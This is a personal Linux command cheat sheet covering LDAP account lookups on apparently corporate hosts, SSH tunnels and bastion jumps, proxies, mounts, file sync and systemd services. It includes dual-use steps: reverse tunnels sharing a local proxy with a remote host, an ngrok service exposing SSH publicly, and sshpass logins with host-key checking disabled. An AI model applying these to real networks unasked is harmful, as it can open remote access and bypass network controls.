ldapsearch -LLL -o ldif-wrap=no -H $LDAP_HOST -b $BASE_DN -D $LDAP_USER -w $LDAP_PASSWORD $LDAP_FILTER

find owner of account

LDAP_HOST=ubsinfesv0015.vantage.org
LDAP_USER="uid=Vitali,ou=people,dc=group,dc=zur"

ldapsearch -LLL -o ldif-wrap=no -H $LDAP_HOST -b $BASE_DN -D $LDAP_USER -w $LDAP_PASSWORD 
ldapsearch -LLL -o ldif-wrap=no -h $LDAP_HOST -b "DC=vantage,DC=org" samaccountname=pen_import-s
ldapsearch -LLL -o ldif-wrap=no -h $LDAP_HOST -b "OU=Accounts,DC=vantage,DC=org" samaccountname=cherkavi
ldapsearch -LLL -o ldif-wrap=no -h $LDAP_HOST -b "OU=Accounts,DC=vantage,DC=org" -s sub "displayName=Vitalii Cherkashyn"
ldapsearch -LLL -o ldif-wrap=no -h $LDAP_HOST -b "OU=Accounts,DC=vantage,DC=org" -s sub "[email protected]"
ldapsearch -LLL -o ldif-wrap=no -h $LDAP_HOST -b "OU=Accounts,DC=vantage,DC=org" -s sub "[email protected]" -D "CN=Vitalii Cherkashyn,OU=Users,OU=UBS,OU=Accounts,DC=vantage,DC=org" -Q -W
# in case of error message: No Kerberos credentials available
kinit pen_import-s

find all accounts in LDAP

# list of the accounts
ldapsearch -LLL -o ldif-wrap=no -E pr=1000/noprompt -h $LDAP_HOST -b "DC=vantage,DC=org" samaccountname=r-d-ubs-developer member 
# account name and e-mail 
ldapsearch -LLL -o ldif-wrap=no -E pr=1000/noprompt -h $LDAP_HOST -b "DC=vantage,DC=org" cn="Vitalii Cherkashyn" samaccountname
ldapsearch -LLL -o ldif-wrap=no -E pr=1000/noprompt -h $LDAP_HOST -b "DC=vantage,DC=org" cn="Vitalii Cherkashyn" samaccountname mail

Architecture


links

Linux Debian cheat sheet

common

commands gnu commands

time 
# run GNU version of the command:
/usr/bin/time
# or 
\time 

retrieve human readable information from binary files

strings /usr/share/teams/libEGL.so | grep git

place for scripts, permanent script

### system wide for all users
### /etc/profile is only run at login
### ~/.profile file runs each time a new shell is started 
# System-wide .bashrc file for interactive bash(1) shells.
/etc/bash.bashrc
# system-wide .profile file for the Bourne shell sh(1)
/etc/profile
/etc/environment
/etc/profile.d/my_new_update.sh

### during user login
~/.bash_profile
# executed by Bourne-compatible login shells.
~/.profile 

# during open the terminal, executed by bash for non-login shells.
~/.bashrc

socket proxy, proxy to remote machine

ssh -D <localport> <user>@<remote host>

and checking if it is working for 'ssh -D 7772 [email protected]'

ssh -o "ProxyCommand nc -x 127.0.0.1:7772 %h %p" [email protected]

jumpserver proxy jump host bastion

# ssh [email protected] -o "proxycommand ssh -W %h:%p -i /home/admin/.ssh/identity-bastionhost [email protected]"  -t "su - admin" 
# ssh [email protected] -t "su admin"  ssh -i /home/admin/.ssh/identity-bastionhost [email protected]
# ssh [email protected] "su admin && ssh -i /home/admin/.ssh/identity-bastionhost [email protected]"
# ssh [email protected] -t "su admin" "ssh -i /home/admin/.ssh/identity-bastionhost [email protected]"
# ssh [email protected] -t "su admin"  [email protected]

# localhost ---->  35.35.13.49 ---->   10.0.12.10
# all identity files must be placed on localhost !!!
ssh -Ao ProxyCommand="ssh -W %h:%p -p 22 $PROD_BASTION_USER@$PROD_BASTION_HOST" -i $EC2_INVENTORY -p $EC2_AIRFLOW_PORT $EC2_AIRFLOW_USER@$EC2_AIRFLOW_HOST $*

scp bastion scp proxy scp copy via bastion

scp -o "ProxyCommand ssh -W %h:%p -p 22 $PROD_BASTION_USER@$PROD_BASTION_HOST" -i $EC2_KEY 1.md $EC2_USER@$EC2_HOST:~/

scp error

bash: scp: command not found

solution: scp should be installed on both!!! hosts

tunnel, port forwarding from local machine to outside

ssh -L <local_port>:<remote_host from ssh_host>:<remote_port> <username>@<ssh_host>
# ssh -L 28010:remote_host:8010 user_name@remote_host
ssh -L <local_port>:<remote_host from ssh_host>:<remote_port> <ssh_host>
# ssh -L 28010:vldn337:8010 localhost

# destination service on the same machine as ssh_host
# localport!=remote_port (28010!=8010)
ssh -L 28010:127.0.0.1:8010 user_name@remote_host

from local port 7000 to remote 5005

ssh -L 7000:127.0.0.1:5005 [email protected]

browser(ext_host) -> 134.190.2.5 -> 134.190.200.201

[email protected]:~$ ssh -L 134.190.2.5:8091:134.190.200.201:8091 [email protected]
user@ext_host:~$ wget 134.190.2.5:8091/echo 

tunnel, port forwarding from outside to localmachine

# ssh -R <remoteport>:<local host name>:<local port> <hostname>
# localy service on port 9092 should be started
# and remotelly you can reach it out just using 127.0.0.1:7777
ssh -R 7777:127.0.0.1:9092 localhost

tunnel for remote machine with proxy, local proxy for remote machine, remote proxy access

//TODO local=======>remote
after that, remote can use local as proxy

first of all start local proxy (proxychains or redsock)

sudo apt install privoxy
sudo vim /etc/privoxy/config
# listen-address  127.0.0.1:9999
# forward-socks5t / http://my-login:[email protected]:8080 .
# forward-socks4a / http://my-login:[email protected]:8080 .
# or 
# forward   /      http://my-login:[email protected]:8080
systemctl start privoxy
# locally proxy server on port 9999 should be started
ssh -D 9999 127.0.0.1 -t ssh -R 7777:127.0.0.1:9999 [email protected]

# from remote machine you can execute 
wget -e use_proxy=yes -e http_proxy=127.0.0.1:7777 https://google.com

ssh suppress banner, ssh no invitation

ssh -q my_server.org

ssh verbosive, ssh log, debug ssh

ssh -vv my_server.org

ssh variable ssh envvar ssh send variable

ssh variable in command line

ssh -t user@host VAR1="Petya" bash -l

sshd config

locally: ~/.ssh/config

SendEnv MY_LOCAL_VAR

remotely: /etc/ssh/sshd_config

AcceptEnv MY_LOCAL_VAR

ssh environment, execute on remote server bash file after login

echo "VAR1=Hello" > sshenv
echo "VAR2=43" >> sshenv
scp sshenv user@server:~/.ssh/environment
ssh user@server myscript

ssh run command

ssh -t user@host 'bash -s' < my-script.sh
# with arguments
ssh -t user@host 'bash -s' -- < my-script.sh arg1 arg2 arg3
# ssh document here 
ssh -T user@host << _dochere_marker
cd /tmp
echo $(date) >> visit-marker.txt
_dochere_marker

local proxy cntlm, cntlm proxy

  app_1 --.
           \
  app_2 --- ---> local proxy <---> External Proxy <---> WWW
   ...     /
  app_n --'

install cntlm

# temporarily set proxy variables for curl and brew to work in this session
$ export http_proxy=http://<user>:<password>@proxy-url:proxy-port
$ export https_proxy=$http_proxy

# update & upgrade apt
$ sudo --preserve-env=http_proxy,https_proxy apt-get update
$ sudo --preserve-env=http_proxy,https_proxy apt-get upgrade

# finally, install cntlm
sudo --preserve-env=http_proxy,https_proxy apt-get install cntlm

edit configuration

vim ~/.config/cntlm/cntlm.conf
Username user-name
Domain  domain-name
Proxy   proxy-url:proxy-port
NoProxy localhost, 127.0.0.*, 10.*, 192.168.*, *.zur
Listen  3128

or globally

sudo vim /etc/cntlm.conf

~/bin/proxy-start.sh

#!/bin/sh

pidfile=~/.config/cntlm/cntlm.pid

if [ -f $pidfile ]; then
    kill "$(cat $pidfile)"
    sleep 2
fi

cntlm -c ~/.config/cntlm/cntlm.conf -P $pidfile -I

source ~/bin/proxy-settings.sh

proxy_url="http://127.0.0.1:3128"
export http_proxy=$proxy_url
export https_proxy=$http_proxy
export HTTP_PROXY=$http_proxy
export HTTPS_PROXY=$http_proxy

export _JAVA_OPTIONS="-Dhttp.proxyHost=127.0.0.1 -Dhttp.proxyPort=3128 -Dhttps.proxyHost=127.0.0.1 -Dhttps.proxyPort=3128 -Dhttps.nonProxyHosts=localhost|*.ubsgroup.net|*.muc -Dhttp.nonProxyHosts=localhost|*.ubsgroup.net|*.zur"

check status

sudo invoke-rc.d cntlm status
ss -lt | grep 3128

possible solution to detect remote client to your machine

# open access
ping -s 120 -c 1 146.255.193.66
ping -s 121 -c 1 146.255.193.66
ping -s 122 -c 1 146.255.193.66

# close access
ping -s 123 -c 1 146.255.193.66

open ports, open connections, listening ports, application by port, application port, process port, pid port

# list of open files
sudo lsof -i -P -n | grep LISTEN
# list of files for specific user
lsof -u my_own_user 

# limit of files for user
ulimit -a


# list of open connections
sudo netstat -tulpan | grep LISTEN
sudo ss -tulwn | grep LISTEN

# list of open ports
sudo nmap -sT -O 127.0.0.1

# print pid of process that occupying 9999 port
sudo ss -tulpan 'sport = :9999'

# open input output
iotop

# list of services mapping service to port mapping port to service
less /etc/services

mount drive to path mount

# <drive> <path>
sudo mount /dev/sdd /tin

mount remote filesystem via ssh, map folder via ssh, ssh remote folder

sudo mkdir /mnt/vendor-cluster-prod
sudo sshfs -o allow_other,IdentityFile=~/.ssh/id_rsa [email protected]:/remote/path/folder /mnt/vendor-cluster-prod
# sudo fusermount -u /remote/path/folder
# sudo umount /remote/path/folder

mount remote filesystem via ftp

sudo apt install curlftpfs
sudo mkdir /mnt/samsung-note
curlftpfs testuser:[email protected]:2221 /mnt/samsung-note/

samsung phone android phone folder

cd /run/user/1000/gvfs
# phone samsung
cd /run/user/1000/gvfs/mtp:host=SAMSUNG_SAMSUNG_Android_RFxxxxxxxxx

mount windows folder, mount windows shared folder

sudo apt install nfs-common
sudo apt install cifs-utils

sudo mkdir -p /mnt/windows-computer
USER_NAME='my-username'
USER_DOMAIN='ZUR'
USER_SERVER='//u015029.ubsbank.net/home$/x453337/'
sudo mount -t cifs -o auto,gid=$(id -g),uid=$(id -u),username=$USER_NAME,domain=$USER_DOMAIN,vers=2.1 $USER_SERVER /mnt/windows-computer

mount issue

bad option;  for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.
sudo apt-get install nfs-common
sudo apt-get install cifs-utils

mount usb drive temporary mount disk

sudo mount /dev/sdd    /media/tina-team

unmount usb detach usb

umount /dev/sdd

mount usb drive permanently mount, map drive

sudo mkdir /mnt/disks/k8s-local-storage1
sudo chmod 755 /mnt/disks/k8s-local-storage1
sudo ln -s /mnt/disks/k8s-local-storage1/nfs nfs1
ls -la /mnt/disks
ls -la /mnt

sudo blkid
sudo vim /etc/fstab
# add record
# UUID=42665716-1f89-44d4-881c-37b207aecb71 /mnt/disks/k8s-local-storage1 ext4 defaults 0 0

# refresh fstab, reload
sudo mount -av
ls /mnt/disks/k8s-local-storage1

option 2

sudo vim /etc/fstab
# add line
# /dev/disk/by-uuid/8765-4321    /media/usb-drive         vfat   0   0

# copy everything from ```mount```
# /dev/sdd5 on /media/user1/e91bd98f-7a13-43ef-9dce-60d3a2f15558 type ext4 (rw,nosuid,nodev,relatime,uhelper=udisks2)
# /dev/sda1 on /media/kali/usbdata type fuseblk (rw,nosuid,nodev,relatime,user_id=0,group_id=0,default_permissions,allow_other,blksize=4096,uhelper=udisks2)

# systemctl daemon-reload

sudo mount -av

mount remote drive via network

10.55.0.3:/mnt/disks/k8s-local-storage/nfs /mnt/nfs nfs rw,noauto,x-systemd.automount,x-systemd.device-timeout=10,timeo=14 0 0

drive uuid hdd uuid

blkid

list drives, drive list, attached drives

lsblk
fdisk -l

create filesystem, format drive

sudo mkfs -t xfs /dev/xvdb
sudo mke2fs /dev/xvdb

Network Attached Storage ( NAS ), Network File System ( NFS ), RAID

zfs

gpg signature check, asc signature check, crt signature check

kgpg --keyserver keyserver.ubuntu.com --recv-keys 9032CAE4CBFA933A5A2145D5FF97C53F183C045D
gpg --import john-brooks.asc
gpg --verify ricochet-1.1.4-src.tar.bz2.asc

in case of error like:

gpg: Can't check signature: No public key
gpg --import gpg-pubkey.txt
gpg --verify openldap-2.5.13.tgz.asc
sudo apt install oathtool
oathtool -b --totp $CODE_2FA

oathtool: base32 decoding failed: Base32 string is invalid

connect to remote machine via ssh without credentials

# generate new RSA keys, create RSA, generate keys
ssh-keygen -t rsa
ssh-keygen -t rsa -b 4096 -f /tmp/my_ssh_key

( check created file /home/{user}/.ssh/id_rsa )

# if you have copied it, check permissions
chmod 700 ~/.ssh
chmod 700 ~/.ssh/*

print public ssh keys, ssh public keys

cat ~/.ssh/id_rsa.pub

passphrase skip typing ssh-keygen without passphrase, avoid Enter passphrase for key

eval `ssh-agent -s` 
ssh-add $HOME/.ssh/id_rsa

login without typing password

# ssh
sshpass -p my_password ssh [email protected]
sshpass -p my_password ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null [email protected]
# ftp 
sshpass -p $CHINA_PASS sftp -P $CHINA_JUMP_SERVER_PORT $CHINA_USER@$CHINA_JUMP_SERVER

login without typing password

echo $my_password | ssh [email protected]

copy ssh key to remote machine,

ssh-copy-id -p {port} {username}@{machine ip}
ssh-copy-id -i ~/.ssh/id_rsa.pub -o StrictHostKeyChecking=no [email protected]
# manual execution
cat ~/.ssh/id_rsa.pub | ssh [email protected] 'cat >> ~/.ssh/authorized_keys'

# output nothing when ssh key exists, ssh check
ssh-copy-id [email protected] 2>/dev/null

after copying you can use ssh connection with inventory file

# id_rsa - your private key 
ssh -i ~/.ssh/id_rsa [email protected]

automate copying password

./ssh-copy.expect my_user ubsad00015.vantage.org "my_passw" 
#!/usr/bin/expect -f
set user [lindex $argv 0];
set host [lindex $argv 1];
set password [lindex $argv 2];

spawn ssh-copy-id $user@$host
expect "])?"
send "yes\n"
expect "password: "
send "$password\n"
expect eof

sometimes you need to add the following

ssh-agent bash
ssh-add ~/.ssh/id_dsa   # or ~/.ssh/id_rsa

remove credentials ( undo previous command )

ssh-keygen -f "/home/{user}/.ssh/known_hosts" -R "10.140.240.105"

copy ssh key to remote machine, but manually:

cat ~/.ssh/id_rsa.pub | ssh -p {port} {username}@{ip} "cat >> ~/.ssh/authorized_keys"
chmod 700 ~/.ssh ;
chmod 600 ~/.ssh/authorized_keys

issue broken pipe ssh

vim ~/.ssh/config

Host *
    ServerAliveInterval 30
    ServerAliveCountMax 5

ssh fingerprint checking

ssh -o StrictHostKeyChecking=no [email protected]
sshpass -p my_password ssh -o StrictHostKeyChecking=no [email protected]

# check ssh-copy-id, check fingerprint
ssh-keygen -F bmw000013.adv.org
# return 0 ( and info line ), return 1 when not aware about the host

manage multiply keys

$ ls ~/.ssh
-rw-------  id_rsa
-rw-------  id_rsa_bmw
-rw-r--r--  id_rsa_bmw.pub
-rw-r--r--  id_rsa.pub
$ cat ~/.ssh/config 
IdentityFile ~/.ssh/id_rsa_bmw
IdentityFile ~/.ssh/id_rsa
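
a per-host selection sketch in ~/.ssh/config ( host alias and user are hypothetical ):

Host bmw-gateway
    HostName bmw000013.adv.org
    User my_user
    IdentityFile ~/.ssh/id_rsa_bmw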

copy from local machine to remote one, remote copy

scp filename.txt [email protected]:~/temp/filename-from-local.txt

sshpass -p $CHINA_PASS scp -P $CHINA_JUMP_SERVER_PORT 1.txt $CHINA_USER@$CHINA_JUMP_SERVER:
sshpass -p $CHINA_PASS scp -P $CHINA_JUMP_SERVER_PORT 1.txt $CHINA_USER@$CHINA_JUMP_SERVER:~/
sshpass -p $CHINA_PASS scp -P $CHINA_JUMP_SERVER_PORT 1.txt $CHINA_USER@$CHINA_JUMP_SERVER:~/1.txt

copy from remote machine to local

scp -r [email protected]:~/temp/filename-from-local.txt filename.txt 
scp -i $EC2_KEY -r [email protected]:~/airflow/logs/shopify_product_create/product_create/2021-07-17T02:31:19.880705+00:00/1.log 1.log

copy directory to remote machine, copy folder to remote machine

scp -pr /source/directory user@host:the/target/directory

the same as local copy folder

cp -var /path/to/folder /another/path/to/folder

copy file with saving all attributes, copy attributes, copy file with attributes

cp -r --preserve=mode,ownership,timestamps /path/to/src /path/to/dest
cp -r --preserve=all /path/to/src /path/to/dest

copy only when changed

cp --checksum /path/to/src /path/to/dest

change owner

# change owner recursively for current folder and subfolders
sudo chown -R $USER .

rsync singe file copy from remote

#!/bin/bash

if [[ $FILE_PATH != "" ]]; then
    echo "file to copy: $FILE_PATH"
else
    if [[ $1 == "" ]]; then
        echo "provide path to file or env.FILE_PATH"
        exit 1
    else
        FILE_PATH=$1
    fi
fi

USER_CHINA=cherkavi
HOST=10.10.10.1

scp -r $USER_CHINA@$HOST:$FILE_PATH .
# rsync -avz --progress  $USER_CHINA@$HOST:$FILE_PATH $FILE_PATH

sync folders synchronize folders, copy everything between folders, diff folder

!!! rsync is directional: source first, then destination

# print diff 
diff -qr /tmp/first-folder/ /tmp/second-folder

# local sync
rsync -r /tmp/first-folder/ /tmp/second-folder
## -a preserve attributes, -v verbose, -u skip files that are newer in the destination
rsync -avu /tmp/first-folder/ /tmp/second-folder

# sync remote folder to local ( copy FROM remote )
rsync -avz [email protected]:~/test-2020-02-28  /home/projects/temp/test-2020-02-28
# sync remote folder to local ( copy FROM remote ) with specific port with compression
rsync -avz -e 'ssh -p 2233' [email protected]:~/test-2020-02-28  /home/projects/temp/test-2020-02-28

# sync local folder to remote ( copy TO remote )
rsync -avz /home/projects/temp/test-2020-02-28  [email protected]:~/test-2020-02-28  
# sync local folder to remote ( copy TO remote ) include exclude
rsync -avz --include "*.txt" --exclude "*.bin" /home/projects/temp/test-2020-02-28  [email protected]:~/test-2020-02-28  

# sync via bastion
rsync -avz -e 'ssh -Ao ProxyCommand="ssh -W %h:%p -p 22 $PROD_BASTION_USER@$PROD_BASTION_HOST" -i '$EC2_KEY $SOURCE_FOLDER/requirements.txt $EC2_LIST_COMPARATOR_USER@$EC2_LIST_COMPARATOR_HOST:~/list-comparator/requirements.txt
function cluster-prod-generation-sync-to(){
  if [[ $1 == "" ]]; then
      return 1
  fi
  rsync -avz . $USER_GT_LOGIN@ubsdpd00013.vantage.org:~/$1
}

create directory on remote machine, create folder remotely, ssh execute command, ssh remote execution

ssh user@host "mkdir -p /target/path/"

ssh execute command and detach ssh execute detached ssh command SIGHUP Signal Hang UP

each_node="bpde00013.ubsbank.org"
REMOTE_SCRIPT="/opt/app/1.sh"
REMOTE_OUTPUT_LOG="/var/log/1.output"

ssh $REMOTE_USER"@"$each_node "nohup $REMOTE_SCRIPT </dev/null > $REMOTE_OUTPUT_LOG 2>&1 &"

ssh xserver, ssh graphical

option1

deamon settings

vim /etc/ssh/sshd_config
sudo systemctl restart sshd
X11Forwarding yes

connect with X11 forwarding

option 2

export DISPLAY=:0.0
xterm

here document, sftp batch command with bash

sftp -P 2222 my_user@localhost << END_FILE_MARKER
ls
exit
END_FILE_MARKER

env variable, environment variables replace

echo "${VAR_1}" | envsubst
envsubst < path/to/file/with/variables > path/to/output/file
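
quick usage example ( template.txt is a hypothetical file containing ${...} placeholders ):

export NAME=world
echo 'hello ${NAME}' | envsubst          # -> hello world
envsubst '$NAME' < template.txt          # substitute only $NAME, leave other variables untouched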

map folder to another path, mount dir to another location

# map local /tmp folder to another path/drive
sudo mount -B /tmp /mapped_drive/path/to/tmp

mount cdrom ( for virtual machine )

sudo mount /dev/cdrom /mnt

create ram disc

mkdir -p /mnt/my-ram
mount -t tmpfs tmpfs /mnt/my-ram -o size=1024M

repeat command with predefined interval, execute command repeatedly, watch multiple command watch pipe

watch -n 60 'ls -la | grep archive'

execute command in case of changes watch file

ls *.txt | entr firefox 

repeat last command

!!

repeat last command with substring "flow" included into whole command line

!?flow

execute in current dir, inline shell execution

. goto-command.sh

directories into stack

pushd
popd
dirs

to previous folder

cd -

sudo reboot

shutdown -r now

sort, order

# sort human readable sizes ( 2K, 1G, ... )
sort -h
# sort numerically
sort -n
# sort by version numbers ( 1.2 before 1.10 )
sort -V

#  sort by column ( space delimiter )
sort -k 3 <filename>

# sort by column number, with delimiter, with digital value ( 01, 02....10,11 )
sort -g -k 11 -t "/" session.list

# sort with reverse order
sort -r <filename>

print file with line numbers, output linenumbers

cat -n <filename>

split and join big files split and merge, make parts from big file copy parts

split --bytes=1M /path/to/image/image.jpg /path/to/image/prefixForNewImagePieces
# --bytes=1G

cat prefixFiles* > newimage.jpg

cut big file, split big file, cat after threshold

# print only the first 17000 lines
head --lines=17000 big_text_file.txt
# or split into chunks of 17000 lines each
split --lines=17000 big_text_file.txt

unique lines (duplications) into file

add counter and print result

uniq --count

duplicates

print only duplicates ( distinct )

uniq --repeated

print all duplications

uniq -D

unique

uniq --unique

output to columns format output to column

ls | column -t

print column from file, split string with separator

cut --delimiter "," --fields 2,3,4 test1.csv
cut --delimiter "," -f2,3,4 test1.csv

substring with fixed number of chars: from 1.to(15) and 1.to(15) && 20.to(50)

cut -c1-15
cut -c1-15,20-50

output to file without echo on screen, echo without typing on screen

echo "text file" | grep "" > $random_script_filename

system log information, logging

# read log
tail -f /var/log/syslog
# write to system log
echo "test" | /usr/bin/logger -t cronjob
# write log message to another system
logger --server 192.168.1.10 --tcp "This is just a simple log line"

/var/log/messages

commands execution logging session logging

# write output of command to out.txt and execution time to out-timing.txt
script out.txt --timing=out-timing.txt

repository list of all repositories

sudo cat /etc/apt/sources.list*

add repository

add-apt-repository ppa:inkscape.dev/stable

you can find the additional file in

/etc/apt/sources.list.d

or manually add repository

# https://packages.debian.org/bullseye/amd64/skopeo/download
# The following signatures couldn't be verified because the public key is not available
# deb [trusted=yes] http://ftp.at.debian.org/debian/ bullseye main contrib non-free

remove repository

sudo add-apt-repository -r ppa:danielrichter2007/grub-customizer

search after adding

apt-cache search inkscape

update from one repo, single update

sudo apt-get update -o Dir::Etc::sourcelist="sources.list.d/cc-ros-mirror.list" -o Dir::Etc::sourceparts="-" -o APT::Get::List-Cleanup="0" 

remove repository

sudo rm /etc/apt/sources.list.d/inkscape.dev*

avoid to put command into history, hide password into history, avoid history

add space before command

history settings history ignore duplicates history datetime

HISTTIMEFORMAT="%Y-%m-%d %T "
HISTCONTROL=ignoreboth
history

bash settings, history lookup with arrows, tab autocomplete

~/.inputrc

"\e[A": history-search-backward
"\e[B": history-search-forward
set show-all-if-ambiguous on
set completion-ignore-case on
TAB: menu-complete
"\e[Z": menu-complete-backward
set show-all-if-unmodified on
set show-all-if-ambiguous on

script settings

# stop execution when non-zero exit
set -e

# stop execution when an error happens even inside a pipeline
set -eo pipefail

# stop when access to unknown variable 
set -u

# print each command before execution
set -x

# export source export variables
set -a
source file-with-variables.env

execute command via default editor

ctrl+x+e

edit last command via editor

fc

folder into bash script

working folder

pwd

process directory process working dir

pwdx <process id>

bash reading content of the file to command-line parameter

--extra-vars "rpm_version=$(cat version.txt)"
--extra-vars "rpm_version=`cat version.txt`"

all command line arguments to another program

original.sh $*

ubuntu install python

# ubuntu 18 python 3.8
sudo apt install python3.8
sudo rm /usr/bin/python3
sudo ln -s /usr/bin/python3.8 /usr/bin/python3
python3 --version
python3 -m pip install --upgrade pip

auto execute during startup, run during restart, autoexec.bat, startup script run

cron startup run

@reboot
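
example crontab entry ( script path is hypothetical ):

# crontab -e
@reboot /home/user/bin/startup.sh >> /tmp/startup.log 2>&1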

rc0...rc1 - runlevels of linux

ID Name Description
0. Halt Shuts down the system.
1. Single-user Mode Mode for administrative tasks.
2. Multi-user Mode Does not configure network interfaces and does not export networks services.
3. Multi-user Mode with Networking Starts the system normally.
4. Not used/User-definable For special purposes.
5. Graphical Mode Starts the system normally with GUI, as runlevel 3 + display manager.
6. Reboot Reboots the system.

one of the folders /etc/rc1.d ( rc2.d ... )
contains links to /etc/init.d/ scripts named S10nameofscript ( start ) and K10nameofscript ( shutdown ); the script must understand the options: start, stop, restart

/etc/init.d/apple-keyboard

#!/bin/sh
# Apple keyboard init
#
### BEGIN INIT INFO
# Provides:        cherkashyn
# Required-Start:  $local_fs $remote_fs
# Required-Stop:   $local_fs $remote_fs
# Default-Start:   4 5
# Default-Stop:
# Short-Description: apple keyboard Fn activating
### END INIT INFO

# Carry out specific functions when asked to by the system
case "$1" in
  start)
    echo "Starting script blah "
    ;;
  stop)
    echo "Stopping script blah"
    ;;
  *)
    echo "Usage: /etc/init.d/blah {start|stop}"
    exit 1
    ;;
esac
exit 0
sudo update-rc.d apple-keyboard defaults
# sudo update-rc.d apple-keyboard remove
find /etc/rc?.d/ | grep apple | xargs ls -l

custom service, service destination

sudo vim /etc/systemd/system/YOUR_SERVICE_NAME.service
[Unit]
Description=GIVE_YOUR_SERVICE_A_DESCRIPTION

Wants=network.target
After=syslog.target network-online.target

[Service]
Type=simple
ExecStart=YOUR_COMMAND_HERE
Restart=on-failure
RestartSec=10
KillMode=process

[Install]
WantedBy=multi-user.target

ngrok

[Unit]
Description=GIVE_YOUR_SERVICE_A_DESCRIPTION

Wants=network.target
After=syslog.target network-online.target

[Service]
User=my_own_user
Group=my_own_user
Type=simple
ExecStart=/snap/ngrok/53/ngrok --authtoken aaabbbcccddd  tcp 22
Restart=on-failure
RestartSec=10
KillMode=process

[Install]
WantedBy=multi-user.target

service with docker container, service dockerized app

[Unit]
Description=Python app 
After=docker.service
Requires=docker.service

[Service]
TimeoutStartSec=5
Restart=always
ExecStartPre=-/usr/bin/docker stop app
ExecStartPre=-/usr/bin/docker rm app
ExecStart=/usr/bin/docker run \
    --env-file /home/user/.env.app \
    --name app \
    --publish 5001:5001 \
    appauth
ExecStop=/usr/bin/docker stop app

[Install]
WantedBy=multi-user.target

managing services

# alternative of chkconfig
# alternative of sysv-rc-conf

# list all services, service list 
systemctl --all
systemctl list-units --type=service --all

# in case of any changes in service file 
systemctl enable YOUR_SERVICE_NAME

systemctl start YOUR_SERVICE_NAME
systemctl status YOUR_SERVICE_NAME
systemctl daemon-reload
systemctl stop YOUR_SERVICE_NAME

reset X-server, re-start xserver, reset linux gui ubuntu only

Ctrl-Alt-F1
sudo init 3
sudo init 5
sudo pkill X
sudo service lightdm stop
sudo service lightdm force-reload

start

sudo startx
sudo service lightdm start

xbind catch shortcuts, custom shortcuts

doesn't work with "super"/"win" button should be activated in "startup"/service

# "echo 'pressed' > ~/out.txt"
# "xdotool getactivewindow key ctrl+c"
xte 'keydown Control_L' 'key c' 'keyup Control_L'
    release + Control_L + c
xbindkeys --key

xserver automation

keymap

apt-get install xdotool
xdotool windowactivate $each_window 
xdotool key --window $each_window Return alt+f e Down Down Return

linux x-server automation

sudo apt install xautomation
# emulate key Super+L
xte 'keydown Super_L' 'key l' 'keyup Super_L'

find all symlinks

ls -lR . | grep ^l

grep asterix, grep between

cat secrets | grep ".*Name.*Avvo.*"

grep exclude grep skip folder grep folder

grep -ir --exclude-dir=node_modules "getServerSideProps"
grep -r --files-with-matches --exclude-dir={ad-frontend,data-portal}  "\"index\""

grep multi folders

grep -ir "getServerSideProps" /home/folder1 /home/folder2

full path to file, file behind symlink, absolute path to file

readlink -f {file}
readlink -f `dirname $0`
realpath {file}

or

python -c 'import os.path; print(os.path.realpath("symlinkName"))'

filename from path

basename {file}

folder name from path, folder of file, file directory, file folder, parent folder, parent dir

dirname {file}
nautilus "$(dirname -- "$PATH_TO_SVG_CONFLUENCE")"

print full path to files inside folder, check folder for existence path check for existence

ls -d <path to folder>/*
for each_path in `find /mapr/dp.ch/vantage/data/collected/MDF4/complete -maxdepth 5`; do    
    if [ -d "$each_path" ]; 
    then
        echo "exists: $each_path"
    else
        echo "not a path: $each_path"        
    fi
done

ls directory, ls current folder, ls path, ls by path

find $FOLDER -maxdepth 4 -mindepth 4 | xargs ls -lad

calculate size of files by type

find . -name "*.java" -ls | awk '{byte_size += $7} END{print byte_size}'

calculate size of files by type, list of files, sort files by size

du -hs * | sort -h

real path to link

readlink 'path to symlink'

where is program placed, location of executable file

which "program-name"

permission denied

# issue with permission ( usually on NFS or cluster )
# find: '/mnt/nfs/ml-training-mongodb-pvc/journal': Permission denied
# 
# solution:
sudo docker run --volume  /mnt/nfs:/nfs -it busybox /bin/sh
chmod -R +r /nfs/ml-training-mongodb-pvc/journal

find file by name find by name

locate {file name}

exclude DB

/etc/updatedb.conf

find files by mask

locate -ir "brand-reader*"
locate -b "brand-reader"

you need to update the file database: /var/lib/mlocate/mlocate.db

sudo updatedb

find file, search file, skip permission denied suppress permission denied find by name

find . -name "prd-ticket-1508.txt"  2>&1 | grep -v "Permission denied"
# suppress permission denied, error pipe with stderror
find /tmp -name 'labeler.jar' |& grep -v "Permission denied"

find multiply patterns

find . -name "*.j2" -o -name "*.yaml"

find file by last update time

find / -mmin 2

find with exec find md5sum

find . -exec md5sum {} \;
find . -name "*.json" | while read each_file; do cat "$each_file" > "${each_file}".txt; done

delete files that older than 5 days

find ./my_dir -mtime +5 -type f -delete
# default variable, env var default
find ${IMAGE_UPLOAD_TEMP_STORAGE:-/tmp/image_upload} -mtime +1 -type f -delete

find files/folders by name and older than 240 min

find /tmp -maxdepth 1 -name "native-platform*" -mmin +240 | xargs  --no-run-if-empty -I {} sudo rm -r {} >/dev/null 2>&1

find files/folders by regexp and older than 240 min, find depth, find deep

find /tmp -maxdepth 1 -mmin +240 -iname "[0-9]*\-[0-9]" | xargs -I {} sudo rm -r {} >/dev/null 2>&1

find large files, find big files

find . -type f -size +50000k -exec ls -lh {} \;
find . -type f -size +50000k -exec ls -lh {} \; | awk '{ print $9 ": " $5 }'

find files on special level, find on level

find . -maxdepth 5 -mindepth 5

find by mask find

find /mapr/vantage/data/store/processed/*/*/*/*/*/Metadata/file_info.json

find with excluding folders, find exclude

find . -type d -name "dist" ! -path  "*/node_modules/*"

find function declaration, print function, show function

type <function name>
declare -f <function name>

builtin, overwrite command, rewrite command

cd()
{
   # builtin going to execute not current, but genuine function
   builtin cd /home/projects
}

folder size, dir size, directory size, size directory, size folder size of folder, size of directory

sudo du -shc ./*
sudo du -shc ./* | sort -rh | head -5

free space, space size, dir size, no space left

df -ha
df -hT /
du -shx /* | sort -h

# size of folder
du -sh /home

# size my sub-folders
du -mh /home

# print first 5 leaders of size-consumers
# slow way: du -a /home | sort -n -r | head -n 5
sudo du -shc ./* | sort -rh | head -5

du -ch /home
# find only files with biggest size ( top 5 )
find -type f -exec du -Sh {} + | sort -rh | head -n 5

yum ( app search )

yum list {pattern}

( example: yum list python33 )

yum install {package name}
yum repolist all
yum info {package name}
yumdb info {package name}

print all packages and sort according last updated on top

rpm -qa --last

information about package ( help page, how to execute ... )

rpm -qai

information about package with configuration

rpm -qaic
rpm -qi wd-tomcat8-app-brandserver

